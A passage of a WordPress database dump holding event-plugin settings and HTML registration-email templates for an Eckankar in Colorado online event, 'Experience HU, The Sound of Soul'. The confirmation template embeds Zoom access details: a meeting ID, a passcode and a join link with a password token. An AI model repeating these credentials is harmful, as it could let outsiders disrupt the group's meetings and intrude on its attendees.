</div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"a4e5faa9-7044-47fd-a4a1-b7a1746c258e\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 18px 0px 18px 5px; line-height: 22px; text-align: inherit; background-color: #efefef;\" role=\"module-content\" valign=\"top\" bgcolor=\"#efefef\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"font-size: 14pt;\">%%attendees_full_info%%</span> </div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"a265ebb9-ab9c-43e8-9009-54d6151b1600\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 8px 30px 40px 28px; line-height: 22px; text-align: inherit; background-color: #6e6e6e;\" role=\"module-content\" valign=\"top\" bgcolor=\"#6e6e6e\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"></div>\r\n<figure style=\"text-align: center;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px;\">© Eckankar In Colorado -2022</span></figure>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<!-- [if mso]>\r\n                                  </td>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n                                </tr>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n                              </table>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n                            </center>\r\n                            <![endif]--></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</center>\";}}'),(159480,266544,'mec_event_status','EventScheduled'),(159481,266544,'mec_moved_online_link',''),(159482,266544,'mec_cancelled_reason',''),(159483,266544,'mec_display_cancellation_reason_in_single_page',''),(159484,266544,'protect_children',''),(159485,266544,'passster_activate_global_protection',NULL),(159486,266544,'passster_activate_protection',NULL),(159487,266544,'passster_protection_type','password'),(159488,266544,'boldgrid_hide_page_title','0'),(159489,266544,'_thumbnail_id','266472'),(159490,266544,'_oembed_ace4d65561aa575fe8833c60d61f4161','{{unknown}}'),(159491,266544,'boldgrid_in_page_containers','1'),(159493,266544,'_dp_original','266522'),(159494,266544,'_edit_lock','1654617622:2'),(159495,266544,'_edit_last','2'),(161397,266662,'mec_confirmed','1'),(159506,266545,'mec_organizer_id','1'),(159507,266545,'mec_read_more',''),(159508,266545,'mec_more_info',''),(159509,266545,'mec_more_info_title',''),(159510,266545,'mec_more_info_target','_self'),(159511,266545,'mec_cost',''),(159512,266545,'mec_currency','a:0:{}'),(159513,266545,'mec_additional_organizer_ids','a:0:{}'),(159514,266545,'mec_additional_location_ids','a:0:{}'),(159515,266545,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2027-04-11\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2027-04-11\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(159516,266545,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(159517,266545,'mec_certain_weekdays','a:0:{}'),(159518,266545,'mec_allday','0'),(159519,266545,'one_occurrence','0'),(159520,266545,'mec_hide_time','0'),(159521,266545,'mec_hide_end_time','0'),(159522,266545,'mec_comment',''),(159523,266545,'mec_timezone','global'),(159524,266545,'mec_countdown_method','global'),(159525,266545,'mec_public','1'),(159526,266545,'mec_start_date','2027-04-11'),(159527,266545,'mec_start_time_hour','10'),(159528,266545,'mec_start_time_minutes','30'),(159529,266545,'mec_start_time_ampm','AM'),(159530,266545,'mec_start_day_seconds','37800'),(159531,266545,'mec_end_date','2027-04-11'),(159532,266545,'mec_end_time_hour','11'),(159533,266545,'mec_end_time_minutes','30'),(159534,266545,'mec_end_time_ampm','PM'),(159535,266545,'mec_end_day_seconds','84600'),(159536,266545,'mec_repeat_status','0'),(159537,266545,'mec_repeat_type',''),(159538,266545,'mec_repeat_interval','1'),(159539,266545,'mec_repeat_end',''),(159540,266545,'mec_repeat_end_at_occurrences',''),(159541,266545,'mec_repeat_end_at_date',''),(159542,266545,'mec_advanced_days','a:0:{}'),(159543,266545,'mec_in_days',''),(159544,266545,'mec_not_in_days',''),(159545,266545,'mec_hourly_schedules','a:0:{}'),(159546,266545,'mec_booking','a:19:{s:24:\"bookings_limit_unlimited\";s:1:\"1\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(159547,266545,'mec_tickets','a:1:{i:1;a:20:{s:4:\"name\";s:32:\"Experience HU, The Sound of Soul\";s:22:\"ticket_start_time_hour\";s:2:\"10\";s:24:\"ticket_start_time_minute\";s:2:\"30\";s:22:\"ticket_start_time_ampm\";s:2:\"AM\";s:20:\"ticket_end_time_hour\";s:2:\"11\";s:22:\"ticket_end_time_minute\";s:2:\"30\";s:20:\"ticket_end_time_ampm\";s:2:\"PM\";s:11:\"description\";s:13:\"Register Here\";s:19:\"private_description\";s:0:\"\";s:5:\"price\";s:1:\"0\";s:11:\"price_label\";s:0:\"\";s:5:\"limit\";s:0:\"\";s:9:\"unlimited\";s:1:\"1\";s:5:\"seats\";s:1:\"1\";s:14:\"minimum_ticket\";s:1:\"1\";s:14:\"maximum_ticket\";s:0:\"\";s:18:\"stop_selling_value\";s:1:\"0\";s:17:\"stop_selling_type\";s:4:\"hour\";s:5:\"dates\";a:0:{}s:2:\"id\";i:1;}}'),(159548,266545,'mec_fees_global_inheritance','1'),(159549,266545,'mec_fees','a:0:{}'),(159550,266545,'mec_ticket_variations_global_inheritance','1'),(159551,266545,'mec_ticket_variations','a:0:{}'),(159552,266545,'mec_reg_fields_global_inheritance','1'),(159553,266545,'mec_reg_fields','a:0:{}'),(159554,266545,'mec_bfixed_fields','a:0:{}'),(159555,266545,'mec_op','a:0:{}'),(159556,266545,'mec_fields','a:0:{}'),(159557,266545,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:27:\"Eckankar Event Registration\";s:7:\"content\";s:10264:\"<table id=\"u_body\" style=\"border-collapse: collapse; table-layout: fixed; border-spacing: 0; mso-table-lspace: 0pt; mso-table-rspace: 0pt; vertical-align: top; min-width: 320px; margin: 0 auto; background-color: #f1f1f1; width: 100%;\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr style=\"vertical-align: top;\">\r\n<td style=\"word-break: break-word; border-collapse: collapse !important; vertical-align: top;\">\r\n<div class=\"u-row-container\" style=\"padding: 0px; background-color: transparent;\">\r\n<div class=\"u-row\" style=\"margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;\">\r\n<div style=\"border-collapse: collapse; display: table; width: 100%; height: 100%; background-color: transparent;\">\r\n<div class=\"u-col u-col-100\" style=\"max-width: 320px; min-width: 500px; display: table-cell; vertical-align: top;\">\r\n<div style=\"height: 100%; width: 100% !important;\">\r\n<div style=\"box-sizing: border-box; height: 100%; padding: 0px; border: 0px solid transparent;\">\r\n<table style=\"font-family: arial,helvetica,sans-serif;\" role=\"presentation\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"overflow-wrap: break-word; word-break: break-word; padding: 10px; font-family: arial,helvetica,sans-serif;\" align=\"left\">\r\n<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding-right: 0px; padding-left: 0px;\" align=\"center\"><img style=\"outline: none; text-decoration: none; -ms-interpolation-mode: bicubic; clear: both; display: inline-block !important; border: none; height: auto; float: none; width: 100%; max-width: 480px;\" title=\"\" src=\"https://eckankar-colorado.org/wp-content/uploads/2022/04/email-img-registration-600-5.jpg\" alt=\"\" width=\"480\" align=\"middle\" border=\"0\" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"u-row-container\" style=\"padding: 0px; background-color: transparent;\">\r\n<div class=\"u-row\" style=\"margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;\">\r\n<div style=\"border-collapse: collapse; display: table; width: 100%; height: 100%; background-color: transparent;\">\r\n<div class=\"u-col u-col-100\" style=\"max-width: 320px; min-width: 500px; display: table-cell; vertical-align: top;\">\r\n<div style=\"background-color: #ffffff; height: 100%; width: 100% !important; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px;\">\r\n<div style=\"box-sizing: border-box; height: 100%; padding: 0px; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px; border: 0px solid transparent;\">\r\n<table style=\"font-family: arial,helvetica,sans-serif;\" role=\"presentation\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"overflow-wrap: break-word; word-break: break-word; padding: 10px; font-family: arial,helvetica,sans-serif;\" align=\"left\">\r\n<div>\r\n<div style=\"margin: 0px; line-height: 140%; text-align: center; word-wrap: break-word; font-size: 28px; font-weight: bold; color: #f28a27;\">\r\n<p><span style=\"font-size: 20pt; font-weight: bold;\">Event Registration Confirmation</span></p>\r\n</div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"u-row-container\" style=\"padding: 0px; background-color: transparent;\">\r\n<div class=\"u-row\" style=\"margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;\">\r\n<div style=\"border-collapse: collapse; display: table; width: 100%; height: 100%; background-color: transparent;\">\r\n<div class=\"u-col u-col-100\" style=\"max-width: 320px; min-width: 500px; display: table-cell; vertical-align: top;\">\r\n<div style=\"background-color: #ffffff; height: 100%; width: 100% !important; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px;\">\r\n<div style=\"box-sizing: border-box; height: 100%; padding: 0px; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px; border: 1px solid #CCC;\">\r\n<table style=\"font-family: arial,helvetica,sans-serif;\" role=\"presentation\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"overflow-wrap: break-word; word-break: break-word; padding: 10px; font-family: arial,helvetica,sans-serif;\" align=\"left\">\r\n<div>\r\n<p style=\"margin-top: 0; margin-bottom: 16px; font-size: 17px;\"><b>Hello %%first_name%% and thank you for registering!</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 16px; font-size: 16px;\">You are signed up for the following online event:</p>\r\n<p style=\"margin-top: 0; margin-bottom: 16px; font-size: 16px;\"><b><span style=\"color: #f28a27;\">Title: </span>%%event_title%%</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 16px; font-size: 16px;\"><b style=\"color: #f28a27;\">Date: </b>%%event_start_date%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 26px; font-size: 16px;\"><b style=\"color: #f28a27;\">Time: </b>%%event_start_time%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 16px; font-size: 24px; color: #f28a27; font-weight: 600;\">Zoom Login Information:</p>\r\n<p style=\"margin-top: 0; margin-bottom: 16px; font-size: 16px;\"><b>Meeting ID: </b>891 2510 3432<br />\r\n<b>Passcode:</b> 162109</p>\r\n<p style=\"margin-top: 0; margin-bottom: 14px; font-size: 15px;\"><a href=\"https://us02web.zoom.us/j/89125103432?pwd=QVRETUo3bENGM0lKZzhDN2pjVGZnQT09\">https://us02web.zoom.us/j/89125103432?pwd=QVRETUo3bENGM0lKZzhDN2pjVGZnQT09</a></p>\r\n<p style=\"margin-top: 0; margin-bottom: 14px; font-size: 16px;\"><b>Dial-in number: </b>720-707-2699 (for those who need to join by phone)</p>\r\n<p style=\"margin-top: 0; margin-bottom: 14px; font-size: 16px;\">After you click the link, you will be prompted to either download the app to enter the meeting or enter through your browser. Please note that Zoom works best if you download the app. It is more stable and has more functions. Select use computer audio for sound.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 14px; font-size: 16px;\">Please join the meeting 5 - 10 minutes ahead of time to help us start on time. We look forward to seeing you at this online event.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 14px; font-size: 16px;\">See you there!</p>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"u-row-container\" style=\"padding: 0px; background-color: transparent;\">\r\n<div class=\"u-row\" style=\"margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;\">\r\n<div style=\"border-collapse: collapse; display: table; width: 100%; height: 100%; background-color: transparent;\">\r\n<div class=\"u-col u-col-100\" style=\"max-width: 320px; min-width: 500px; display: table-cell; vertical-align: top;\">\r\n<div style=\"background-color: #e8e8e8; height: 100%; width: 100% !important; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px;\">\r\n<div style=\"box-sizing: border-box; height: 100%; padding: 0px; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px; border: 0px solid transparent;\">\r\n<table style=\"font-family: arial,helvetica,sans-serif;\" role=\"presentation\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"overflow-wrap: break-word; word-break: break-word; padding: 10px; font-family: arial,helvetica,sans-serif;\" align=\"left\">\r\n<div>\r\n<div>\r\n<p style=\"padding: 20px; font-size: 16px; line-height: 22px; background-color: #efefef; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35); text-align: center;\">You are receiving this email because you have submitted a request through the <a href=\"https://eckankar-colorado.org/\">Eckankar in Colorado</a> website. If you have any questions regarding the origin of this email, please feel free to get in touch, we\'re always happy to help out.</p>\r\n</div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"u-row-container\" style=\"padding: 0px; background-color: transparent;\">\r\n<div class=\"u-row\" style=\"margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;\">\r\n<div style=\"border-collapse: collapse; display: table; width: 100%; height: 100%; background-color: transparent;\">\r\n<div class=\"u-col u-col-100\" style=\"max-width: 320px; min-width: 500px; display: table-cell; vertical-align: top;\">\r\n<div style=\"background-color: #6e6e6e; height: 100%; width: 100% !important; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px;\">\r\n<div style=\"box-sizing: border-box; height: 100%; padding: 0px; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px; border: 0px solid transparent;\">\r\n<table style=\"font-family: arial,helvetica,sans-serif;\" role=\"presentation\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"overflow-wrap: break-word; word-break: break-word; padding: 10px; font-family: arial,helvetica,sans-serif;\" align=\"left\">\r\n<div>\r\n<div style=\"text-align: center; font-family: arial, helvetica, sans-serif;\"><a href=\"https://www.facebook.com/people/Eckankar-in-Colorado/100067829705562/\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /></a>\r\n<p style=\"text-align: center; font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif;\">© Eckankar In Colorado<br />\r\n<span style=\"font-family: arial, helvetica, sans-serif;\"><a title=\"Contact Us\" href=\"mailto:webmaster@eckankar-colorado.org\"><span style=\"font-size: 14px; line-height: 20px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto; color: #cccccc; margin: 0px;\">Contact Us</span></a></span></p>\r\n</div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:22:\"New Event Registration\";s:7:\"content\";s:8368:\"<table id=\"u_body\" style=\"border-collapse: collapse; table-layout: fixed; border-spacing: 0; mso-table-lspace: 0pt; mso-table-rspace: 0pt; vertical-align: top; min-width: 320px; margin: 0 auto; background-color: #f1f1f1; width: 100%;\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr style=\"vertical-align: top;\">\r\n<td style=\"word-break: break-word; border-collapse: collapse !important; vertical-align: top;\">\r\n<div class=\"u-row-container\" style=\"padding: 0px; background-color: transparent;\">\r\n<div class=\"u-row\" style=\"margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;\">\r\n<div style=\"border-collapse: collapse; display: table; width: 100%; height: 100%; background-color: transparent;\">\r\n<div class=\"u-col u-col-100\" style=\"max-width: 320px; min-width: 500px; display: table-cell; vertical-align: top;\">\r\n<div style=\"height: 100%; width: 100% !important;\">\r\n<div style=\"box-sizing: border-box; height: 100%; padding: 0px; border: 0px solid transparent;\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"u-row-container\" style=\"padding: 0px; background-color: transparent;\">\r\n<div class=\"u-row\" style=\"margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;\">\r\n<div style=\"border-collapse: collapse; display: table; width: 100%; height: 100%; background-color: transparent;\">\r\n<div class=\"u-col u-col-100\" style=\"max-width: 320px; min-width: 500px; display: table-cell; vertical-align: top;\">\r\n<div style=\"background-color: #ffffff; height: 100%; width: 100% !important; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px;\">\r\n<div style=\"box-sizing: border-box; height: 100%; padding: 0px; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px; border: 0px solid transparent;\">\r\n<table style=\"font-family: arial,helvetica,sans-serif;\" role=\"presentation\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"overflow-wrap: break-word; word-break: break-word; padding: 10px; font-family: arial,helvetica,sans-serif; background-color: #efefef;\" align=\"left\">\r\n<div>\r\n<div style=\"margin: 0px; line-height: 140%; text-align: center; word-wrap: break-word; font-size: 28px; font-weight: bold; color: #f28a27;\">\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"color: #1d5791; font-family: arial, helvetica, sans-serif; font-size: 36px;\">Admin Notification</span></div>\r\n</div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"u-row-container\" style=\"padding: 0px; background-color: transparent;\">\r\n<div class=\"u-row\" style=\"margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;\">\r\n<div style=\"border-collapse: collapse; display: table; width: 100%; height: 100%; background-color: transparent;\">\r\n<div class=\"u-col u-col-100\" style=\"max-width: 320px; min-width: 500px; display: table-cell; vertical-align: top;\">\r\n<div style=\"background-color: #ffffff; height: 100%; width: 100% !important; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px;\">\r\n<div style=\"box-sizing: border-box; height: 100%; padding: 0px; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px; border: 1px solid #CCC;\">\r\n<table style=\"font-family: arial,helvetica,sans-serif;\" role=\"presentation\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"overflow-wrap: break-word; word-break: break-word; padding: 10px; font-family: arial,helvetica,sans-serif;\" align=\"left\">\r\n<div style=\"text-align: center;\"><span style=\"color: #707172; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>New Event Registration</strong></span></div>\r\n<div style=\"text-align: center;\"><br />\r\n<span style=\"font-size: 20px; color: #333333;\"><strong>A new registration has been submitted for the following event:</strong></span>\r\n<p> <span style=\"font-size: 19px; color: #23507d;\"><strong>%%event_title%%</strong></span></p>\r\n<div></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Date: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_date%%</strong></span></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Time: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_time%%</strong></span></div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"u-row-container\" style=\"padding: 0px; background-color: transparent;\">\r\n<div class=\"u-row\" style=\"margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;\">\r\n<div style=\"border-collapse: collapse; display: table; width: 100%; height: 100%; background-color: transparent;\">\r\n<div class=\"u-col u-col-100\" style=\"max-width: 320px; min-width: 500px; display: table-cell; vertical-align: top;\">\r\n<div style=\"background-color: #e8e8e8; height: 100%; width: 100% !important; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px;\">\r\n<div style=\"box-sizing: border-box; height: 100%; padding: 0px; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px; border: 0px solid transparent;\">\r\n<table style=\"font-family: arial,helvetica,sans-serif;\" role=\"presentation\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"overflow-wrap: break-word; word-break: break-word; padding: 10px; font-family: arial,helvetica,sans-serif;\" align=\"left\">\r\n<div>\r\n<div>\r\n<p style=\"padding: 20px; font-size: 16px; line-height: 22px; background-color: #efefef; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35); text-align: center;\"><span style=\"font-size: 14pt;\"><span style=\"font-size: 14pt;\">%%attendees_full_info%%</span></span></p>\r\n</div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"u-row-container\" style=\"padding: 0px; background-color: transparent;\">\r\n<div class=\"u-row\" style=\"margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;\">\r\n<div style=\"border-collapse: collapse; display: table; width: 100%; height: 100%; background-color: transparent;\">\r\n<div class=\"u-col u-col-100\" style=\"max-width: 320px; min-width: 500px; display: table-cell; vertical-align: top;\">\r\n<div style=\"background-color: #6e6e6e; height: 100%; width: 100% !important; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px;\">\r\n<div style=\"box-sizing: border-box; height: 100%; padding: 0px; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px; border: 0px solid transparent;\">\r\n<table style=\"font-family: arial,helvetica,sans-serif;\" role=\"presentation\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"overflow-wrap: break-word; word-break: break-word; padding: 10px; font-family: arial,helvetica,sans-serif;\" align=\"left\">\r\n<div>\r\n<div style=\"text-align: center; font-family: arial, helvetica, sans-serif;\"><a href=\"https://www.facebook.com/people/Eckankar-in-Colorado/100067829705562/\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /></a>\r\n<p style=\"text-align: center; font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif;\">© Eckankar In Colorado<br />\r\n<span style=\"font-family: arial, helvetica, sans-serif;\"><a title=\"Contact Us\" href=\"mailto:webmaster@eckankar-colorado.org\"><span style=\"font-size: 14px; line-height: 20px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto; color: #cccccc; margin: 0px;\">Contact Us</span></a></span></p>\r\n</div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\";}}'),(159558,266545,'mec_event_status','EventScheduled'),(159559,266545,'mec_moved_online_link',''),(159560,266545,'mec_cancelled_reason',''),(159561,266545,'mec_display_cancellation_reason_in_single_page',''),(159562,266545,'protect_children',''),(159563,266545,'passster_activate_global_protection',NULL),(159564,266545,'passster_activate_protection',NULL),(159565,266545,'passster_protection_type','password'),(159566,266545,'boldgrid_hide_page_title','0'),(159567,266545,'_thumbnail_id','266472'),(159568,266545,'_oembed_ace4d65561aa575fe8833c60d61f4161','{{unknown}}'),(159569,266545,'boldgrid_in_page_containers','1'),(159571,266545,'_dp_original','266544'),(159572,266545,'_edit_lock','1696390374:2'),(159573,266545,'_edit_last','2'),(161314,266657,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\"